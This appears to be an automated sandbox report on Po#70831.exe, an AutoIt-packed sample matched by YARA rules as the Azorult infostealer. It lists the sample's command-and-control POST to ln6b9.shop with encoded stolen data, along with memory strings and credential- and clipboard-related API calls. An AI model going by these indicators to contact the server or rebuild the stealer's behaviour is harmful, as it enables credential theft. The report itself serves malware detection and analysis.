                Source: unknownHTTP traffic detected: POST /LN341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: ln6b9.shopContent-Length: 109Cache-Control: no-cacheData Raw: 00 00 00 45 14 8b 30 62 ef 26 66 9a 26 66 9a 46 70 9d 35 70 9c 47 70 9d 3a 70 9d 37 70 9d 32 70 9d 37 70 9d 3a 70 9d 33 70 9d 34 14 8b 31 11 8b 30 62 ef 26 66 99 26 66 9a 26 66 9f 26 66 9e 26 66 99 26 66 97 26 67 ea 46 13 8b 30 67 ed 45 17 8b 30 60 8b 30 66 8b 31 11 ef 26 66 96 42 70 9d 35 70 9d 3a 70 9d 32 70 9d 34 70 9d 3b Data Ascii: E0b&f&fFp5pGp:p7p2p7p:p3p410b&f&f&f&f&f&f&gF0gE0`0f1&fBp5p:p2p4p;
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
                Source: Po#70831.exe, 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/LN341/index.php
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ln6b9.shop/LN341/index.phpA
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.thawte.com0
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                Source: mozglue.dll.2.drString found in binary or memory: http://www.mozilla.com/en-US/blocklist/
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://www.mozilla.com0
                Source: Po#70831.exe, 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://dotbit.me/a/
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482873821.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.s
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2z
                Source: svchost.exe, 00000002.00000002.2482787252.0000000003231000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482899863.000000000325F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482873821.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: svchost.exe, 00000002.00000002.2483316959.0000000004DA0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf
                Source: svchost.exe, 00000002.00000002.2482756320.0000000003212000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2482873821.0000000003248000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: svchost.exe, 00000002.00000002.2484249625.0000000006010000.00000004.00001000.00020000.00000000.sdmp, freebl3.dll.2.dr, nssdbm3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: https://www.digicert.com/CPS0
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0050EAFF
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_0050ED6A
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0050EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_0050EAFF
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FAA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput,0_2_004FAA57
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_00529576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_00529576
                Source: Yara matchFile source: Process Memory Space: Po#70831.exe PID: 6900, type: MEMORYSTR

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult Payload Author: kevoreilly
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 2.2.svchost.exe.60c5e12.4.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                Source: 2.2.svchost.exe.605a6c1.5.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                Source: 2.2.svchost.exe.60386d4.6.raw.unpack, type: UNPACKEDPEMatched rule: OlympicDestroyer Payload Author: kevoreilly
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                Source: 00000002.00000002.2482219448.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Azorult_38fce9ea Author: unknown
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Azorult Payload Author: kevoreilly
                Source: 00000000.00000002.2377127925.00000000036E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detect Azorult in memory Author: JPCERT/CC Incident Response Group
                Binary is likely a compiled AutoIt script file
                Source: Po#70831.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: Po#70831.exe, 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8859611d-d
                Source: Po#70831.exe, 00000000.00000002.2371064957.0000000000552000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_345c963e-c
                Source: Po#70831.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_f81f3f0c-9
                Source: Po#70831.exeString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_78b27d31-6
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: Po#70831.exe
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FD5EB: CreateFileW,DeviceIoControl,CloseHandle,0_2_004FD5EB
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F1201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004F1201
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004FE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_004FE8F6
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0049BF400_2_0049BF40
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005020460_2_00502046
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004980600_2_00498060
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004F82980_2_004F8298
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004CE4FF0_2_004CE4FF
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004C676B0_2_004C676B
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_005248730_2_00524873
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0049CAF00_2_0049CAF0
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004BCAA00_2_004BCAA0
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004ACC390_2_004ACC39
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004C6DD90_2_004C6DD9
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004AB1190_2_004AB119
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004991C00_2_004991C0
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B13940_2_004B1394
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B781B0_2_004B781B
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004A997D0_2_004A997D
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004979200_2_00497920
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B7A4A0_2_004B7A4A
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004B7CA70_2_004B7CA7
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_0051BE440_2_0051BE44
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_004C9EEE0_2_004C9EEE
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: 0_2_036D36100_2_036D3610
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00403B98 appears 44 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E64 appears 33 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 00404E3C appears 87 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004062D8 appears 34 times
                Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 004034E4 appears 36 times
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: String function: 004B0A30 appears 46 times
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: String function: 004AF9F2 appears 40 times
                Source: C:\Users\user\Desktop\Po#70831.exeCode function: String function: 00499CB3 appears 31 times
                Source: api-ms-win-crt-multibyte-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-convert-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-filesystem-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-math-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-string-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-heap-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-conio-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-file-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-runtime-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-rtlsupport-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-environment-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-file-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-process-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-libraryloader-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-sysinfo-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-memory-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-private-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-processthreads-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-heap-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-stdio-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-util-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-errorhandling-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-interlocked-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-processenvironment-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-synch-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-file-l2-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-console-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-timezone-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-handle-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-string-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-synch-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-profile-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-debug-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-localization-l1-2-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-namedpipe-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-datetime-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-core-processthreads-l1-1-1.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-locale-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-utility-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: api-ms-win-crt-time-l1-1-0.dll.2.drStatic PE information: No import functions for PE file found
                Source: Po#70831.exe, 00000000.00000003.2370066895.0000000003D7D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Po#70831.exe
                Source: Po#70831.exe, 00000000.00000003.2369813239.0000000003BD3000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Po#70831.exe
                Source: Po#70831.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 0.2.Po#70831.exe.36e0000.1.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 0.2.Po#70831.exe.36e0000.1.raw.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
                Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Azorult_38fce9ea reference_sample = 405d1e6196dc5be1f46a1bd07c655d1d4b36c32f965d9a1b6d4859d3f9b84491, os = windows, severity = x86, creation_date = 2021-08-05, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Azorult, fingerprint = 0655018fc803469c6d89193b75b4967fd02400fae07364ffcd11d1bc6cbbe74a, id = 38fce9ea-a94e-49d3-8eef-96fe06ad27f8, last_modified = 2021-10-04
                Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
